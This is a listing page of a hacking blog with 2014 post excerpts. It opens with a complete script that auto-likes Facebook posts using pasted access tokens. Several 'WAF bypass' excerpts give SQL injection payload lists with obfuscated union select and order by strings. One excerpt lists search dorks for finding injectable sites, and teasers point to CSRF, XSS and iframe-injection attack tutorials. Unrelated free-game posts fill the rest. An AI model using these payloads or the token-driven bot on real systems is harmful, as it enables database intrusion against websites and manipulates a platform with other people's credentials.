Wednesday, 12 November 2014

How TO Make Facebook Auto Like Script...

Assalamualaikum..Hello everyone ? How are you today ?In this time, i will share trick auto like facebook with google script.This Script working and safe.Oke Lets Go !!!Script like this :PHP Code:var robot={SearchLimit:3,idGroups:["",],AllTokens:[{name:"YOUR FB NAME",token:"PASTE YOUR TOKEN HERE"}]};//Using Trigger in Function "modeon()" with Timer per-Minute//function PullBoss(almt,prop){var a=UrlFetchApp.fetch(almt,{muteHttpExceptions:true,method:"post",payload:prop});var b=Utilities.jsonParse(a.getContentText());return b;}function stir(what){var a=what.sort(function(){return 0.5-Math.random()});a.reverse();a=a.sort(function(){return 0.5-Math.random()});return a;}function modeon(){var a=stir(robot.AllTokens);if(a[0].token==""){robot.tokenNow=a[0].apptkn;}else{robot.tokenNow=a[0].token;}var p=PullBoss("https://graph.facebook.com/me",{method:"get",fields:"id",access_token:robot.tokenNow});if(p&&p.id){robot.uidNow=p.id;var b=stir(robot.idGroups);robot.idGroupSekarang=b[0];var q=PullBoss("https://graph.facebook.com/me/home",{method:"get",fields:"id,likes,comments.fields(id,user_likes)",limit:robot.SearchLimit,access_token:robot.tokenNow});if(q&&q.data&&q.data.length!=0){for(x in q.data){var c="y";var d=q.data[x];if(d.likes&&d.likes.data&&d.likes.data.length!=0){for(y in d.likes.data){if(d.likes.data[y].id&&d.likes.data[y].id==robot.uidNow){c="n";break;}}}if(c=="n"&&d.comments&&d.comments.data&&d.comments.data.length!=0){for(z in d.comments.data){if(!d.comments.data[z].user_likes){var r=PullBoss("https://graph.facebook.com/"+d.comments.data[z].id+"/likes",{method:"post",access_token:robot.tokenNow});break;}}}if(c=="y"){var r=PullBoss("https://graph.facebook.com/"+d.id+"/likes",{method:"post",access_token:robot.tokenNow});}}}}} Go...
Read more...

Tuesday, 11 November 2014

All Type of Advance WAF Bypass Part 3…..

Hi all .This the 3rd and last part of the All Type of Advance WAF Bypass …..So lets start hope you enjoy……." union select version(),2,3,4,5,6,7--","+union+select+version(),2,3,4,5,6,7--","\'+union+select+version(),2,3,4,5,6,7--","/**/union/**/select/**/version(),2,3,4,5,6,7/**/","/*+*/union/*+*/select/*+*/version(),2,3,4,5,6,7/*+*/","/**/union/**/select/**/all/*!50000select*/version(),2,3,4,5,6,7/**/","%20and%20%28select%201%29%20=%20%28select%202%29%20union%20all%20select%20version%28%29%206%207%202%203--","+and...
Read more...

All Type of Advance WAF Bypass Part 2…..

Hi all .This the 2nd part of the All Type of Advance WAF Bypass …..So lets start hope you enjoy.......SQLI Injction WAF Bypass Methods With Details--'- : +--+ / : -- - : --+- : /*) order by 1-- -') order by 1-- -')order by 1%23%23%')order by 1%23%23Null' order by 100--+Null' order by 9999--+')group by 99-- -'group by 119449-- -'group/**/by/**/99%23%23union select ByPassing method+union+distinct+select++union+distinctROW+select+/**//*!12345UNION...
Read more...

All Type of Advance WAF Bypass Part 1.....

Today i will share u a very awesome tutorial that is All Type of Advance WAF Bypass.......So lets start...hope you all like it..------------------------------Best Bypass WAF------------------------------------[~] order by [~]/**/ORDER/**/BY/**//*!order*/+/*!by*//*!ORDER BY*//*!50000ORDER BY*//*!50000ORDER*//**//*!50000BY*//*!12345ORDER*/+/*!BY*/[~] UNION select [~]/*!00000Union*/ /*!00000Select*//*!50000%55nIoN*/...
Read more...

Monday, 3 November 2014

Snow Bross Free Online Games

Play Snow Bros free Online ...
Read more...

Grand Theft Auto Full Game Free Play Online

 Grand Theft Auto Full Game Free Play Online Is Now Available Here. GTA One Of The Top Popular Series Publisher By Rockstar Games And Enjoy To Play Everyone. Everyone Enjoy To Played This Series On Their Personal Computer But Now You Can Play Right Now. How To Play- Just Visit The Instruction Pages.Wait Few Minutes To Loads Game Properly- 1% To 100% Complete To Start Click Play&nb...
Read more...

Mustapha Game Totally Free Play Online

Mustapha Game Free Play Online Is Right Now. Easily To Start And Enjoy To Play Right Here. Top Action Both Fighting DiversionLike To Play Everyone. Note: You Have To Need Good Internet Connection And Check Your Adobe Flash Player Before Start. Normally Control Key Used By Player1 Mode: WASD Move Key And HJK Action Key And Player2 Mode: Arrow Key Move And 123 Numeric Button Key. Mustapha Games...
Read more...

Desperado Full Game Free Play Online

Wait Few Minutes To Loads Desperado Game Properly- 1% To 100% Complete To Start Click PlayPlay Desperado !-- Insert this code before your tag ...
Read more...

Thursday, 30 October 2014

How to make your own software installer.......

Today i will show you how to make your own software as a installer so watch this and feel free to comment........ Software Installer by Pak Defender from Anonymous Ghost on Vim...
Read more...

How to Install Wordpress On Xammp....

Today I will show you how to install wordpress on xampp watch this and feel free to comment....... Install Wordpress on Xammp from Anonymous Ghost on Vim...
Read more...

Sunday, 26 October 2014

How to Find Injection Point FOR SQL Injection......

 Hello Guys .....Today i will tell you how to find injection point for sqli in a simple trick and you can easily inject ....Please every Injectors must comments there methods here which i will ask nowPlease every injectors mention there methods to find outInjection Point in the website[SQLI]MY methods --->1. inurl:.php?id= site:www.sitename.com2.site:www.sitename.com "php?"Sometimes i use...
Read more...

Saturday, 18 October 2014

BASIC CSRF (CROSS SITE REQUEST FORGERY) TUTORIAL

This tutorial will explain how to perform A Basic Cross Site Request Forgery Attack (CSRF).So let's start the tutorial, What is CSRF Attack?CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. With a little help of social...
Read more...

Wednesday, 24 September 2014

Learn Cross Site Scripting Vulnerability & Exploit (XSS)

Hello, Guys here after short break m back with my Cool Post on XSS (Cross Site Scripting), today m gonna explain you : How Cross Site Scripting works, How to Prevent it and Understanding XSS Vulnerability & Exploits. Basically many of you'd not understood XSS Exploits Properly, So lets create, Explore,...
Read more...

Monday, 15 September 2014

DOM Based Cross Site Scripting(XSS) vulnerability Tutorial

So far i have explained about the Traditional Cross site scripting that occurs because of insecure server-side code. In this post , i am going to explain the DOM Based Cross Site Scripting vulnerability. if you don't know what is cross site scripting , then i recommend you to read the basics from here.Before...
Read more...

New XSS Cheat Sheet - Bypassing Modern Web Application Firewall XSS Filters

  While we doing web application penetration testing for our clients, we may some time have to face the Web application Firewall that blocks every malicious request/payload.There are some Cheat sheets available on internet that helped to bypass WAF in the past. However, those cheats won't...
Read more...

Mass IFrame Attack Tutorial

Recently 90000 webpages infected by Iframe Injection attack.  Here i am going to explain what  IFrame Injection is. What is an IFrame Injection?Using IFrame tag, The Attackers injects the malware contain website(links) using Cross site Scripting in popular websites.  So if the usual visitors of that popular sites opens the website, it will redirect to malware contain website. ...
Read more...

Cross Site Scripting(XSS) Complete Tutorial....

 What is XSS?Cross Site Scripting also known as XSS , is one of the most common web appliction vulnerability that allows an attacker to run his own client side scripts(especially Javascript) into web pages viewed by other users.In a typical XSS attack, a hacker inject his malicious javascript code...
Read more...